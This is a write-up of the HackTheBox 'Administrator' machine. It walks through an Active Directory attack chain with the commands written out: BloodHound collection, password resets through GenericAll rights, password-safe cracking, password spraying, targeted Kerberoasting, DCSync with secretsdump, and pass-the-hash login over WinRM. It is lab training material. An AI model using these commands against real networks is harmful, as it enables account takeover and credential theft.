Box Info
Administrator box image

Setup

mkdir -p ~/ctf/HackTheBox/administrator/scans; cd ~/ctf/HackTheBox/administrator IP Address: 10.10.11.42

echo "10.10.11.42 administrator.htb" | sudo tee -a /etc/hosts 10.10.11.42 administrator.htb

Enumeration

nmap -sC -sV -Pn -p- administrator.htb -oN scans/nmap -vv

nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 administrator.htb

# nmap findings
Host is up, received user-set (0.076s latency).
Scanned at 2025-06-01 09:50:51 IST for 105s
Not shown: 65509 closed tcp ports (conn-refused)
PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-06-01 11:00:09Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
56890/tcp open  msrpc         syn-ack Microsoft Windows RPC
60272/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
60283/tcp open  msrpc         syn-ack Microsoft Windows RPC
60288/tcp open  msrpc         syn-ack Microsoft Windows RPC
60291/tcp open  msrpc         syn-ack Microsoft Windows RPC
60310/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

As this is a assumed breach challenge, we have Username: Olivia Password: ichliebedich

Using rusthound -d administrator.htb -u 'Olivia' -p 'ichliebedich' -o 'bloodhound' -z -i 10.10.11.42 [Pasted_image_20250601100957.png]

[Pasted_image_20250601101029.png]

We see here olivia user is a member of Remote Management Users, hence we can use winrm to get a shell.

We have a outbound GenericAll rights on Michael: [Pasted_image_20250601101122.png]

Michael has a right to change password for Benjamin: [Pasted_image_20250601101252.png]

Using:

net rpc password "michael" "Password@123" -U "administrator.htb"/'Olivia'%'ichliebedich' -S 10.10.11.42

net rpc password "benjamin" "Password@123" -U "administrator.htb"/'michael'%'Password@123' -S 10.10.11.42

[Pasted_image_20250601104706.png]

As the ftp port was open and using CrackMapExec, we checked that benjamin has access to ftp

[Pasted_image_20250601105304.png]

Backup.psafe3 is a Password Safe V3 database using John’s guide, We extract and crack the hash using john

[Pasted_image_20250601105825.png]

[Pasted_image_20250601111250.png]

unlocked the password file and got 3 passwords, we will use cme to spary the password on all users: [Pasted_image_20250601111535.png]

Found emily:UX******************** Checking Bloodhound we see emily has GenericWrite on ethan

[Pasted_image_20250601111655.png]

Using targetedKerberoast.py we get, krb5tgs hash for ethan:

sudo timedatectl set-ntp off

sudo rdate -n 10.10.11.42

python3 targetedKerberoast.py -v -d 'administrator.htb' --dc-ip 10.10.11.42 -u 'emily' -p 'UX********************'

[Pasted_image_20250601112333.png]

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$dbcf0f6c96a09a4f61a178a331005a62$f254d30973e9bc2ffafd5da012262c27d3bfe652d55daac84964d355a67e4cccc776050fc48ed899e291e6d992833bac8998ed56e680ab5dee4a7bab4605e46571ce3f094657e786********************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************

we have winrm access using emily user:

[Pasted_image_20250601112529.png]

using Winrm we get the user flag

[Pasted_image_20250601112708.png]

User Flag

Location: C:\Users\emily\Desktop\user.txt | Flag: 2b5********************

Privilege Escalation

Using Ethan krb5tgs obtained above we crack it using hashcat -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt

[Pasted_image_20250601113053.png]

we get credentials: ethan:li********************

Checking bloodhound for ethan we see that ethan has outbound control on Administrator:

[Pasted_image_20250601113259.png]

DCsync attack is performed using the GetChangesAll attribute, to exploit this we can use secretsdump.py

[Pasted_image_20250601113557.png]

Administrator:3dc********************

logging in using winrm evil-winrm -i 10.10.11.42 -u 'Administrator' -H '3dc********************'

[Pasted_image_20250601113846.png]

Root Flag

Location: C:\Users\Administrator\Desktop\root.txt | Flag: 877********************